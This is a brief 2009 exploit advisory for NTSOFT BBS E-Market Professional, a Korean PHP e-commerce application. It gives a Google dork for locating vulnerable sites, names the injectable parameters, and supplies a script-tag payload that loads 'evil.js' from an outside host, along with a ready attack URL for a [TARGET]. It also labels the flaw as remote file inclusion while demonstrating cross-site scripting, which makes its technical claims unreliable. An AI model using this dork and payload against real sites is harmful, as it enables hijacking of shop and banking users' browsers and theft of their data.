+==========================================================================+ + NTSOFT BBS E-Market Professional & XSS - Remote Evil Java + +==========================================================================+ Author(s): Ivan Sanchez Product: BBS E-Market Professional Vendor Overview: NTSOFT Vendor Homepage: http://www.nt.co.kr/ http://www.bbs2000.co.kr/ Date: 29/07/2009 "most off all korean sites that handle e-shop , e-banking,... use this software" Description: ------------ BBS E-Market Professional is a Korean Web based e-commerce application implemented in PHP. BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The issue presents itself due to improper validation of user-supplied data. "In the past the same software had a lot of bugs in others parameters & versions" GOOGLE DORKS: ------------ intext: "Copyright (c) 2003 NTSOFT All rights reserved" Parameters affected: ------------------- page= evil.js bt_code= evil.js b_no= evil.js Evil Code to put: ----------------- Example: "><script src=http://site/scripts/evil.js></script> Example URl: http://[TARGET]becommunity/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs! +==========================================================================+ + NTSOFT BBS E-Market Professional & XSS - Remote Evil Java + +==========================================================================+